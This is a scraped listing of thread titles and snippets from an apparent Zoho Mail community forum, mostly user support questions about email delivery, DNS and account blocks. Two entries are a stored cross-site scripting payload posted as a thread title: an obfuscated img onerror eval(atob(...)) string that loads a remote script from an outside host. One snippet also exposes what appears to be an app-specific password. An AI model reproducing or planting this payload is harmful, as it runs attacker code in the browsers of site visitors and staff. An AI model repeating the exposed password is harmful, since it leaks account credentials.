Invalid Client Secret
I am trying to authorize zoho mail from my wordpress zoho mail plugin, i followed all the steps but I kepp getting "invalid client secret" at the end of the process, i am trying to authorize with this domain "" What coyld the problem be please?
Signon from Desktop Client (Thunderbird) getting Refused
Trying to setup my Thunderbird client. I have used it before using Standard Credentials and Also using App Password (after MFA setup). On my migrated computer neither of the above options is working. Tried disabling and enabling MFA too.
No Email after changing DNS NS
My domain is registered through AWS. I had my website hosted there and had ZOHO mail MX settings all working for a while. Yesterday changed the hosting of my website to a different company, and changed the NS setting in my Hosted Zone from AWS to point
i can't send
i have mail using website
Problem receiving email !
Hello, please how to solve my problem i send email to others but not receiving any email from anyone!! whatsapp/ 009647504532737
Red dots all over the screen
Hi, I want to know how to disable those red dots advertising features. I want to just use my e-mail inbox, not hunt down red dots clicking on buttons or checking new features, the dots blink and jump and move, it has become extremely annoying.
Unable to receive emails from website contact form
Hi everyone, I'm currently using Zoho as my e-mail provider for my Shopify store. I used these instructions to configure the DNS records and it's working fine, because I can both send en receive emails from this address. There is only one problem: I don't
Unusual activity detected. Your account is locked from sending emails
Hello I am using zoho mail at work. But I don't understand why my account is locked from sending emails. I use zoho mail purpose to contact partners in the project. Hope zoho team unlock email to help me. I hope zoho team support as soon as possible thank
Unusual activity detected. Your account is locked from sending emails
Hello I am using zoho mail at work. But I don't understand why my account is locked from sending emails. I use zoho mail purpose to contact partners in the project. Hope zoho team unlock email to help me. I hope zoho team support as soon as possible thank
Unusual activity detected. Your account is locked from sending emails
Dear zoho team, I use my Zoho mail account to send e-mails to my partners at work. In each project, I have to send emails to exchange information in the project with partners. But for some reason my account is locked from sending emails. Hope zoho team
Unable to send message;Reason:553 Relaying disallowed. Invalid Domain
Dear Team, When i try to send mail through ZOHO mail i am getting the following error. "Unable to send message;Reason:553 Relaying disallowed. Invalid Domain" Can i get some help on this. Thanks,
Can send emails but can't receive them
Can send emails but can't receive them! I have set up MX records on Namecheap listed in SORBS SPAM
Hi, The following IP was added to the SORBS SPAM blacklist. Could you please apply for it to be removed, as emails are landing in spam?
Urgent : Zoho Mail : Email Outgoing Blocked
My email address has email outgoing blocked. I changed jobs recently and i wanted to send out an email with my new address to my colleagues. how can i facilitate that without getting blocked?
553 Relaying disallowed. Invalid Domain -
Hello, after domain renewal, I have the problem with 553 Relaying disallowed. I tried all the 3 options with domain reverification - TXT, DNS and HTML File, but still didn't manage to reverify the domain ownership. Please help me with this issue.
Spamhaus Blacklisted IP
I cannot send any emails because Spamhaus has blacklisted your IP address
Zoho Mail - Delay in Receiving Emails
Hello, We experienced a minor glitch within Zoho Mail service due to this there was a delay in processing all the incoming emails. Our technical team had identified and fixed the same. Processing the queue backlog is under progress. New emails will get
Sort Mail?
Is it just me or is there no way to sort the email results by date or sender once I've run a search in the search bar at the top?
Unable to send to from Zoho Mail to Hotmail.
Hi, I am unable to send a mail from Zoho to Hotmail. It bounces back as shown below. That Hotmail address normally receives mails OK. So I believe it's an issue with Zoho. (Note: I have altered the mail addresses in this post with "xxx", for privacy).
My Email is Blocked
Hi, i Need to unblock my Email. I Can´t Unblock It.My Name is Alejandro Rocco, i am the user administrator.
Change of company name
Hello, How do I change the name on my email address, I mean the name before the domain name? I even tried adding it as new email but it wants me to verify, but I can't verify because It hasn't been set yet. A quick reply will be much appreciated.
Announcing ZUG Meet-ups in Jeddah, Cairo, JoBurg & CapeTown - Meet Zoho Mail Experts!
We are excited to announce the User Community initiative to meet you all in person and help you master the Zoho Mail's Admin console. We aim to help you become the experts of the Zoho Mail Admin console. Come and meet us in your own city or in a city
Mail Delivery Status Notification (Delay) - To Zoho Support Email
Hi there, I've received the following delay notification when emailing most email addresses including zoho support email: This message was created automatically by mail delivery system. THIS IS A WARNING MESSAGE ONLY. YOU DO NOT NEED TO RESEND YOUR MESSAGE.
SMTP server time outs and slow
Is there an issue with Zoho servers? I am getting a lot of timeouts while receiving and sending email. Even Zoho's web email clients is crashing. This is not something I want to be wasting my time on during business hours..
Forever Free - IMAP Restrictions
OK - so I just spent quite a bit of time configuring my DNS for Zoho Mail, only to find out that you don't support IMAP with the Forever Free plan. Are you folks for real?
Signature image size changing on replied emails
Hi, Sometimes I see the size of the image I use as signature changes when I open replied emails. Do you know why is this happening? It doesn't seem to happen when I send emails to Gmail though. Signature should look like in attachment "Signature_normal.jpg"
Streamlining Sales Processes: Tips and Best Practices
Dear fellow Zoho community members, As a sales professional, I'm always looking for ways to improve my sales processes and make them more efficient. I'm sure many of you feel the same way. That's why I wanted to start a discussion about streamlining sales
Sub-Tags in ZOHO Mail?
Is there a way to add sub-tags in Zoho Mail. GMAIL provides the ability to Group Tags at multiple levels. Having one level is unwieldy when using more than a dozen tags.
Can't delete mailbox alias
Hello, I recently changed my personal mail from to Out of the blue mailbox alias was created. I can't delete it but it is also the default domain account when composing mail.
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL21wc29hcWxhOGwiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vanMucmlwL21wc29hcWxhOGwiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(>
Missing Item
So we have an issue My employee tried using books help chat and guy couldn't grasp problem. I tried using inventory help chat and my guy also couldn't grasp the problem. I have Invoices with an Item on them "Install 20 gallon Pressure Tank". My employee
Is is available to access notes from mobile app?
As you know we have a notes section in the mail system at the website but can I access the Notes from the mobile app? Thanks in advance
Zoho Desk e-Widget populating phone number incorrectly
Just recently, every time I attempt to convert a ticket using the e-Widget, and click create.. it prompts that the phone number is incorrectly formatted. The number showing is formatted in the US standard format (xxx) xxx-xxxx. All special characters
Relay access denied
When I am sending mail it will show mail sent but the receiver did not receive the mail and getting the below error message.
Specific Emails not Arriving Mailbox
Specific emails have not been arriving at our mailbox despite the various senders informing us that it has been sent. Mails from gmail are arriving but some business mails aren't.
Trying to connect it to Next Auth and doesn't send email
EmailProvider({ server: '', port: 587, //I have tried also port 465 auth: { user: '<<theuseremail>>', //I have also used the gmail login email and nothing pass: 'Qyc2y31WAymM', //this password is an app specific password. I tried
Zoho does not receive emails anymore from the address I am registered with
Hi, I suspect a dns issue. As things stand, Zoho still receives emails from third parties but cannot receive emails from the address I created my account with. Thanks for your help, Philippe
Enforced TLS tunnel from Zoho Mail
Hi, I am looking for some advice regarding enforced TLS tunnel being set up from Zoho mail. I do not want to use opportunistic encryption and I want to make sure all incoming and outgoing email are encrypted with TLS. Is it possible using Zoho or do I need to use third party for setting up enforced TLS tunnel ? Thanks
lolipopサーバを使っています。 MXの設定が原因かと疑い、まずはMXの設定を消してみると、lolipop web mailerでは両アドレスとも受信可能になる。 再度MXを設定してzohoに飛ばすようにしたら、やはりinfoの方は送受信できるが、supportの方は受信できない。 infoと、supportのアカウントのメール設定を見てみると infoの方はimappro.zoho.comと、smtppro.zoho.comが設定されている。 supportの方は、設定表示項目自体が違うのだが、imap.lolipop.jpのサーバーになっている。
Certain emails are rejected completely and do not even go to spam
A certain email (and maybe more) is rejected by zoho completely and does not even show up in our spam folder. That email is: I know this is the case because they also cc a gmail account that we have as well as sending it to our
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